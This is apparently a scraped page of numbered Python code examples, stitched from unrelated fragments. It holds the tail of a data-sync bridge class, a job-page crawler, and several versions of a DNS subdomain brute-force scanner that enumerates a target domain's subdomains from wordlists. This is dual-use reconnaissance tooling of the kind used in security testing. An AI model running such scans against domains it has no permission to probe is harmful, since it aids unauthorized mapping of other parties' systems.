                         extra={'MESSAGE_ID': 'exception'})
            self.filler = spawn(self.fill_resource_items_queue)
        logger.info('Filter threads {}'.format(fill_threads),
                    extra={'FILTER_THREADS': fill_threads})

        main_threads = self.workers_max - self.workers_pool.free_count()
        logger.info('Main threads {}'.format(main_threads),
                    extra={'MAIN_THREADS': main_threads})

        if len(self.workers_pool) < self.workers_min:
            for i in xrange(0, (self.workers_min - len(self.workers_pool))):
                w = ResourceItemWorker.spawn(self.api_clients_queue,
                                             self.resource_items_queue,
                                             self.db, self.workers_config,
                                             self.retry_resource_items_queue,
                                             self.api_clients_info)
                self.workers_pool.add(w)
                logger.info('Watcher: Create main queue worker.')
                self.create_api_client()
        retry_threads = self.retry_workers_max -\
            self.retry_workers_pool.free_count()
        logger.info('Retry threads {}'.format(retry_threads),
                    extra={'RETRY_THREADS': retry_threads})
        if len(self.retry_workers_pool) < self.retry_workers_min:
            for i in xrange(
                    0, self.retry_workers_min - len(self.retry_workers_pool)):
                self.create_api_client()
                w = ResourceItemWorker.spawn(self.api_clients_queue,
                                             self.retry_resource_items_queue,
                                             self.db, self.workers_config,
                                             self.retry_resource_items_queue,
                                             self.api_clients_info)
                self.retry_workers_pool.add(w)
                logger.info('Watcher: Create retry queue worker.')

        # Log queues size and API clients count
        main_queue_size = self.resource_items_queue.qsize()
        logger.info('Resource items queue size {}'.format(main_queue_size),
                    extra={'MAIN_QUEUE_SIZE': main_queue_size})
        retry_queue_size = self.retry_resource_items_queue.qsize()
        logger.info(
            'Resource items retry queue size {}'.format(retry_queue_size),
            extra={'RETRY_QUEUE_SIZE': retry_queue_size})
        api_clients_count = len(self.api_clients_info)
        logger.info('API Clients count: {}'.format(api_clients_count),
                    extra={'API_CLIENTS': api_clients_count})

    def _calculate_st_dev(self, values):
        if len(values) > 0:
            avg = sum(values) * 1.0 / len(values)
            variance = map(lambda x: (x - avg)**2, values)
            avg_variance = sum(variance) * 1.0 / len(variance)
            st_dev = math.sqrt(avg_variance)
            return round(st_dev, 3)
        else:
            return 0

    def _mark_bad_clients(self, dev):
        # Mark bad api clients
        for cid, info in self.api_clients_info.items():
            if info.get('grown', False) and info['avg_duration'] > dev:
                info['drop_cookies'] = True
                logger.debug('Perfomance watcher: Mark client {} as bad, avg.'
                             ' request_duration is {} sec.'.format(
                                 cid, info['avg_duration']),
                             extra={'MESSAGE_ID': 'marked_as_bad'})
            elif info['avg_duration'] < dev and info['request_interval'] > 0:
                info['drop_cookies'] = True
                logger.debug('Perfomance watcher: Mark client {} as bad,'
                             ' request_interval is {} sec.'.format(
                                 cid, info['request_interval']),
                             extra={'MESSAGE_ID': 'marked_as_bad'})

    def perfomance_watcher(self):
        avg_duration, values = self._get_average_requests_duration()
        for _, info in self.api_clients_info.items():
            delta = timedelta(seconds=self.perfomance_window +
                              self.watch_interval)
            current_date = datetime.now() - delta
            delete_list = []
            for key in info['request_durations']:
                if key < current_date:
                    delete_list.append(key)
            for k in delete_list:
                del info['request_durations'][k]
            delete_list = []

        st_dev = self._calculate_st_dev(values)
        if len(values) > 0:
            min_avg = min(values) * 1000
            max_avg = max(values) * 1000
        else:
            max_avg = 0
            min_avg = 0
        dev = round(st_dev + avg_duration, 3)

        logger.info('Perfomance watcher:\nREQUESTS_STDEV - {} sec.\n'
                    'REQUESTS_DEV - {} ms.\nREQUESTS_MIN_AVG - {} ms.\n'
                    'REQUESTS_MAX_AVG - {} ms.\nREQUESTS_AVG - {} sec.'.format(
                        round(st_dev, 3), dev, min_avg, max_avg, avg_duration),
                    extra={
                        'REQUESTS_DEV': dev * 1000,
                        'REQUESTS_MIN_AVG': min_avg,
                        'REQUESTS_MAX_AVG': max_avg,
                        'REQUESTS_AVG': avg_duration * 1000
                    })
        self._mark_bad_clients(dev)

    def run(self):
        logger.info('Start Edge Bridge',
                    extra={'MESSAGE_ID': 'edge_bridge_start_bridge'})
        logger.info('Start data sync...',
                    extra={'MESSAGE_ID': 'edge_bridge__data_sync'})
        self.input_queue_filler = spawn(self.fill_input_queue)
        self.filler = spawn(self.fill_resource_items_queue)
        spawn(self.queues_controller)
        while True:
            self.gevent_watcher()
            sleep(self.watch_interval)
示例#28
0
class SubNameBrute:
    def __init__(self, target, options):
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.i
        self.scan_count = self.found_count = 0
        self.console_width = getTerminalSize()[0] - 2
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _ in self.resolvers:
            _.lifetime = _.timeout = 10.0
        self.print_count = 0
        self.STOP_ME = False
        self._load_dns_servers()
        self._load_next_sub()
        self.queue = PriorityQueue()
        self.priority = 0
        self._load_sub_names()
        if options.output:
            outfile = options.output
        else:
            _name = os.path.basename(self.options.file).replace('subnames', '')
            if _name != '.txt':
                _name = '_' + _name
            outfile = target + _name if not options.full_scan else target + '_full' + _name
        self.outfile = open(outfile, 'w')
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers

    def _load_dns_servers(self):
        print '[+] Validate DNS servers ...'
        self.dns_servers = []
        pool = Pool(30)
        for server in open('dict/dns_servers.txt').xreadlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server,))
        pool.join()

        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        print '[+] Found %s available DNS Servers in total' % self.dns_count
        if self.dns_count == 0:
            print '[ERROR] No DNS Servers available.'
            sys.exit(-1)

    def _test_server(self, server):
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            answers = resolver.query('public-dns-a.baidu.com')    # test lookup a existed domain
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            try:
                resolver.query('test.bad.dns.lijiejie.com')    # Non-existed domain test
                with open('bad_dns_servers.txt', 'a') as f:
                    f.write(server + '\n')
                self._print_msg('[+] Bad DNS Server found %s' % server)
            except:
                self.dns_servers.append(server)
            self._print_msg('[+] Check DNS Server %s < OK >   Found %s' % (server.ljust(16), len(self.dns_servers)))
        except:
            self._print_msg('[+] Check DNS Server %s <Fail>   Found %s' % (server.ljust(16), len(self.dns_servers)))

    def _load_sub_names(self):
        self._print_msg('[+] Load sub names ...')
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                self._print_msg('[ERROR] Names file not exists: %s' % self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        self._print_msg('[+] Load next level subs ...')
        self.next_subs = []
        _set = set()
        _file = 'dict/next_sub.txt' if not self.options.full_scan else 'dict/next_sub_full.txt'
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    tmp_set = {sub}
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace('{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            _set.add(item)
                            self.next_subs.append(item)

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            self.print_count += 1
            if self.print_count < 100:
                return
            self.print_count = 0
            msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        elif _msg.startswith('[+] Check DNS Server'):
            sys.stdout.write('\r' + _msg + ' ' * (self.console_width - len(_msg)))
        else:
            sys.stdout.write('\r' + _msg + ' ' * (self.console_width - len(_msg)) + '\n')
            if _found_msg:
                msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                    self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        sys.stdout.flush()

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            self._print_msg()
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.ignore_intranet and SubNameBrute.is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1

                    if ips not in self.ip_dict:
                        self.ip_dict[ips] = 1
                    else:
                        self.ip_dict[ips] += 1

                    if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6:
                        continue

                    self.found_count += 1
                    msg = cur_sub_domain.ljust(30) + ips
                    self._print_msg(msg, _found_msg=True)
                    self._print_msg()
                    self.outfile.write(cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
示例#29
0
class SubNameBrute:
    def __init__(self, target, options):
        # save result to list
        self.subdomains = list()
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.i
        self.scan_count = self.found_count = 0
        self.console_width = getTerminalSize()[0] - 2
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.threads)]
        for _ in self.resolvers:
            _.lifetime = _.timeout = 10.0
        self.STOP_ME = False
        self._load_dns_servers()
        self._load_next_sub()
        self.queue = PriorityQueue()
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers

    def _load_dns_servers(self):
        self.dns_servers = []
        pool = Pool(30)
        for server in open('dict/dns_servers.txt').xreadlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server,))
        pool.join()

        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        if self.dns_count == 0:
            sys.exit(-1)

    def _test_server(self, server):
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            answers = resolver.query('public-dns-a.baidu.com')    # test lookup a existed domain
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            try:
                resolver.query('test.bad.dns.lijiejie.com')    # Non-existed domain test
                with open('bad_dns_servers.txt', 'a') as f:
                    f.write(server + '\n')
            except:
                self.dns_servers.append(server)
        except:
            pass
    def _load_sub_names(self):
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('dict/%s' % self.options.file):
                _file = 'dict/%s' % self.options.file
            else:
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        self.next_subs = []
        _set = set()
        _file = 'dict/next_sub.txt' if not self.options.full_scan else 'dict/next_sub_full.txt'
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    tmp_set = {sub}
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace('{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            _set.add(item)
                            self.next_subs.append(item)

   

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.ignore_intranet and SubNameBrute.is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count += 1
                        answers = self.resolvers[j].query(cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) - 1]    # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1

                    if ips not in self.ip_dict:
                        self.ip_dict[ips] = 1
                    else:
                        self.ip_dict[ips] += 1

                    if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6:
                        continue

                    self.found_count += 1
                    msg = cur_sub_domain.ljust(30) + ips

                    # save result to list
                    self.subdomains.append([cur_sub_domain,ips])


                    try:
                        self.resolvers[j].query('lijiejietest.' + cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout) as e:
                pass
示例#30
0
class SubNameBrute:
    def __init__(self, target, options):
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.i
        self.scan_count = self.found_count = 0
        self.console_width = getTerminalSize()[0] - 2
        self.resolvers = [
            dns.resolver.Resolver(configure=False)
            for _ in range(options.threads)
        ]
        for _ in self.resolvers:
            _.lifetime = _.timeout = 10.0
        self.print_count = 0
        self.STOP_ME = False
        self._load_dns_servers()
        self._load_next_sub()
        self.queue = PriorityQueue()
        self.priority = 0
        self._load_sub_names()
        if options.output:
            outfile = options.output
        else:
            _name = os.path.basename(self.options.file).replace('subnames', '')
            if _name != '.txt':
                _name = '_' + _name
            outfile = target + _name if not options.full_scan else target + '_full' + _name
        self.outfile = open(outfile, 'w')
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers
        self.result_lines = []
        self.result_domains = []
        self.result_ips = []

    def _load_dns_servers(self):
        print '[+] Validate DNS servers ...'
        self.dns_servers = []
        pool = Pool(30)

        # change file location
        for server in open('lijiejie/' + 'dict/dns_servers.txt').xreadlines():
            server = server.strip()
            if server:
                pool.apply_async(self._test_server, (server, ))
        pool.join()

        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        print '[+] Found %s available DNS Servers in total' % self.dns_count
        if self.dns_count == 0:
            print '[ERROR] No DNS Servers available.'
            sys.exit(-1)

    def _test_server(self, server):
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            answers = resolver.query(
                'public-dns-a.baidu.com')  # test lookup a existed domain
            if answers[0].address != '180.76.76.76':
                raise Exception('incorrect DNS response')
            try:
                resolver.query(
                    'test.bad.dns.lijiejie.com')  # Non-existed domain test
                with open('bad_dns_servers.txt', 'a') as f:
                    f.write(server + '\n')
                self._print_msg('[+] Bad DNS Server found %s' % server)
            except:
                self.dns_servers.append(server)
            self._print_msg('[+] Check DNS Server %s < OK >   Found %s' %
                            (server.ljust(16), len(self.dns_servers)))
        except:
            self._print_msg('[+] Check DNS Server %s <Fail>   Found %s' %
                            (server.ljust(16), len(self.dns_servers)))

    def _load_sub_names(self):
        self._print_msg('[+] Load sub names ...')
        if self.options.full_scan and self.options.file == 'subnames.txt':
            _file = 'lijiejie/' + 'dict/subnames_full.txt'
        else:
            if os.path.exists(self.options.file):
                _file = self.options.file
            elif os.path.exists('lijiejie/' + 'dict/%s' % self.options.file):
                _file = 'lijiejie/' + 'dict/%s' % self.options.file
            else:
                self._print_msg('[ERROR] Names file not exists: %s' %
                                self.options.file)
                exit(-1)

        if self.options.debug:
            _file = 'lijiejie/' + 'dict/debug.txt'
            if not os.path.exists(_file):
                self._print_msg('[ERROR] Names file not exists: %s' %
                                self.options.file)
                exit(-1)

        normal_lines = []
        wildcard_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            for line in f.xreadlines():
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                if sub.find('{alphnum}') >= 0 or sub.find(
                        '{alpha}') >= 0 or sub.find('{num}') >= 0:
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    if sub not in wildcard_list:
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            self.priority += 1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        self._print_msg('[+] Load next level subs ...')
        self.next_subs = []
        _set = set()
        _file = 'lijiejie/' + 'dict/next_sub.txt' if not self.options.full_scan else 'dict/next_sub_full.txt'
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    tmp_set = {sub}
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                                tmp_set.add(
                                    item.replace('{alphnum}', _letter, 1))
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace(
                                    '{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            _set.add(item)
                            self.next_subs.append(item)

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            self.print_count += 1
            if self.print_count < 100:
                return
            self.print_count = 0
            msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                self.found_count, self.queue.qsize(), self.scan_count,
                time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                             msg)
        elif _msg.startswith('[+] Check DNS Server'):
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)))
        else:
            sys.stdout.write('\r' + _msg + ' ' *
                             (self.console_width - len(_msg)) + '\n')
            if _found_msg:
                msg = '%s Found| %s Groups| %s scanned in %.1f seconds' % (
                    self.found_count, self.queue.qsize(), self.scan_count,
                    time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) +
                                 msg)
        sys.stdout.flush()

    @staticmethod
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count(
            '{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            self.queue.put((self.priority + num * 10000000, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            self._print_msg()
            try:
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer, e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(
                        sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.ignore_intranet and SubNameBrute.is_intranet(
                            answers[0].address):
                        continue

                    try:
                        self.scan_count += 1
                        answers = self.resolvers[j].query(
                            cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(
                                self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) -
                                              1]  # new sub
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1

                    if ips not in self.ip_dict:
                        self.ip_dict[ips] = 1
                    else:
                        self.ip_dict[ips] += 1

                    if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6:
                        continue

                    self.found_count += 1
                    msg = cur_sub_domain.ljust(30) + ips
                    self._print_msg(msg, _found_msg=True)
                    self._print_msg()

                    # TODO: close write file
                    self.outfile.write(
                        cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()

                    self.result_lines.append(
                        cur_sub_domain.ljust(30) + '\t' + ips)
                    self.result_domains.append(cur_sub_domain)
                    self.result_ips.extend(ips.split(", "))

                    try:
                        self.resolvers[j].query('lijiejietest.' +
                                                cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer,
                    dns.exception.Timeout) as e:
                pass
示例#31
0
class JobSpider:
    def __init__(self, start_requests):
        self.start_request = start_requests
        self.domain = tldextract.extract(self.start_request.url).domain

        self.request_queue = PriorityQueue()
        self.result = {
            start_requests.url: 0,
        }
        self.gl_list = []
        self.stop_flag = False

    def start(self, number):
        resp = requests.get(self.start_request.url)
        if resp.status_code != 200:
            raise Exception('HTTPError<%d>' % resp.status_code)

        self.request_queue.put((0, self.start_request))
        for i in range(number):
            gl = gevent.spawn(self.downloader)
            self.gl_list.append(gl)
            gl.start()

    def stop(self):
        self.stop_flag = True

    def join(self):
        return gevent.joinall(self.gl_list)

    def downloader(self):
        a_re = re.compile(
            r'''<a.+?href=(['"])([^>\s]+)\1.*?>([\S\s]+?)<\/a>''',
            re.IGNORECASE)

        while not self.request_queue.empty():
            if self.stop_flag: break
            prio, request = self.request_queue.get()
            headers = {'User-Agent': choice(random_ua)}
            try:
                resp = requests.get(request.url, headers=headers)
            except Exception as e:
                continue

            encoding = chardet.detect(resp.content)['encoding']
            html_text = resp.content.decode(
                encoding) if encoding is not None else resp.text
            self.result[request.url] += calc_text_weight(html_text)
            if self.result[request.url] >= 100:
                self.stop()
                break

            if request.depth == max_depth:
                continue

            matches = a_re.findall(html_text)
            for each_a in matches:
                href = each_a[1]
                name = each_a[2]
                if href.startswith('javascript'): continue
                if href.startswith('/'): href = request.url + href
                if href.startswith('http'):
                    new_request = Request(href, request.depth + 1)
                    self.result[href] = calc_name_url_weight(name, href)
                    if tldextract.extract(href).domain == self.domain:
                        self.request_queue.put(
                            (-self.result[href], new_request))
                    elif self.result[href] >= 80:
                        self.request_queue.put(
                            (-self.result[href], new_request))
class SubNameBrute:
    """
        receive commandline args and do some initialization work
    """
    def __init__(self, target, options):
        self.start_time = time.time()
        self.target = target.strip()
        self.options = options
